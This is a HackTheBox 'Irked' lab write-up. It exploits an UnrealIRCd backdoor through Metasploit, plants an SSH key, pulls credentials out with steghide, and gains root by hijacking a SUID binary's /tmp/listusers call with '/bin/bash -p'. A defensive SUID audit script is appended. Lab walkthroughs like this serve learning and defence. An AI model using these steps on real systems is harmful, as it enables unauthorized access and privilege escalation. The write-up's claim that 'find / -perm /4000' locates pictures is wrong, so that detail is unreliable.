HackTheBox - Irked

Morten Hansen • January 30, 2022

Irked

IP: 10.10.10.117

NMAP

22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35157/tcp6  status
|   100024  1          42921/udp   status
|   100024  1          44845/udp6  status
|_  100024  1          55063/tcp   status
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          45871/udp6  status
|   100024  1          46832/tcp   status
|   100024  1          47014/udp   status
|_  100024  1          58172/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
46832/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

BROWSER

gobuster dir -u 10.10.10.117 -w /usr/share/wordlists/dirb/big.txt -t 100 | tee gobuster
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/manual               (Status: 301) [Size: 313] [--> http://10.10.10.117/manual/]
/server-status        (Status: 403) [Size: 300]  
Apache HTTP Server Version 2.4

:irked.htb 256 morthius :Administrative info about irked.htb
:irked.htb 257 morthius :Bob Smith
:irked.htb 258 morthius :bob
:irked.htb 258 morthius :widely@used.name
ADMIN           LICENSE         PART            USERHOST
AWAY            LINKS           PING            USERIP
CREDITS         LIST            PONG            VERSION
CYCLE           LUSERS          PRIVMSG         VHOST
DALINFO         MAP             QUIT            WATCH
DCCALLOW        MODE            RULES           WHO
INVITE          MODULE          SETNAME         WHOIS
ISON            MOTD            SILENCE         WHOWAS
JOIN            NAMES           STATS
KICK            NICK            TIME
KNOCK           NOTICE          TOPIC

:irked.htb 292 morthius : -
┌──(kali㉿kali)-[~]
└─$ nmap --script irc-unrealircd-backdoor.nse 10.10.10.117 -p 8067 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 16:26 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.067s latency).

PORT     STATE SERVICE
8067/tcp open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Nmap done: 1 IP address (1 host up) scanned in 17.99 seconds
use exploit/unix/irc/unreal_ircd_3281_backdoor

uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Create a .ssh folder inside the ircd home folder and set chmod 700, then import my key into authorized_keys and chmod 600. Then use ssh ircd@10.10.10.117.

echo "ssh-rsa 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 kali@kali" > /home/ircd/.ssh/authorized_keys
$ cd Documents 
$ ls
user.txt
$ cat user.txt
cat: user.txt: Permission denied
$ sudo -l
-sh: 18: sudo: not found
$ strings .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

This hints towards steganography, which in 99% of cases is a way of hiding information, mostly in pictures. We do a search for pictures with find / -perm /4000 2>/dev/null and get a list that contains the irked.jpeg picture from http://10.10.10.117. We use steghide extract -sf irked.jpeg with the password UPupDOWNdownLRlrBAbaSSss and get a file called pass.txt. This contains the string Kab6h+m+bbp2J:HG. We try this with su root and su djmargov and get access as djmargov.

We later run linpeas.sh and focus on the SUID list. This shows an abnormal file called /usr/bin/viewuser. If we try to run it we get the following text:

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-10-28 13:04 (:0)
ircd     pts/0        2021-10-28 13:14 (10.10.16.6)
sh: 1: /tmp/listusers: not found

This tells us it tries to run a shell script from /tmp/listusers that does not exist yet. We create a script called listusers in /tmp with nano.

#!/bin/bash

/bin/bash -p

We then run viewuser again and get a root shell!
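The weakness behind viewuser is a setuid binary that executes a fixed path inside a world-writable directory. The following audit script is an added example for defenders, not part of the original writeup or of the box: it lists setuid binaries under a given root and flags any that embed a path under /tmp, /var/tmp or /dev/shm, using a constructed fixture (make_fixture) so it can be run offline.

```shell
#!/bin/sh
# Added example (not from the writeup): audit setuid binaries for embedded
# paths in world-writable directories, the pattern seen in /usr/bin/viewuser
# calling /tmp/listusers.

# scan_binary FILE: print every embedded path under a world-writable
# directory found in FILE, one per line (empty output means clean).
scan_binary() {
  tr -c '[:print:]' '\n' < "$1" \
    | grep -oE '/(tmp|var/tmp|dev/shm)/[^[:space:]]*' || true
}

# audit_suid ROOT: for each setuid file under ROOT, print
# "path: hit [hit ...]" when scan_binary finds something.
audit_suid() {
  root="${1:-/}"
  find "$root" -xdev -type f -perm -4000 2>/dev/null | sort \
    | while IFS= read -r bin; do
      hits=$(scan_binary "$bin")
      if [ -n "$hits" ]; then
        printf '%s: %s\n' "$bin" "$(printf '%s' "$hits" | tr '\n' ' ' | sed 's/ $//')"
      fi
    done
}

# make_fixture: constructed sample data, not files from the box. Creates a
# fake setuid "binary" that references /tmp/listusers and a clean setuid
# file, then prints the directory so callers can scan and remove it.
make_fixture() {
  dir=$(mktemp -d)
  printf 'This application is being developed\nsh -c /tmp/listusers\n' > "$dir/viewuser"
  printf 'clean setuid helper\n' > "$dir/clean"
  chmod 4755 "$dir/viewuser" "$dir/clean"
  printf '%s\n' "$dir"
}

# Demo on the fixture; on a real host run `audit_suid /` instead.
fixture=$(make_fixture)
audit_suid "$fixture"
rm -rf "$fixture"
```

Any binary reported here deserves a look at what it executes, because a low-privileged user who can write the referenced path controls what runs with the owner's privileges.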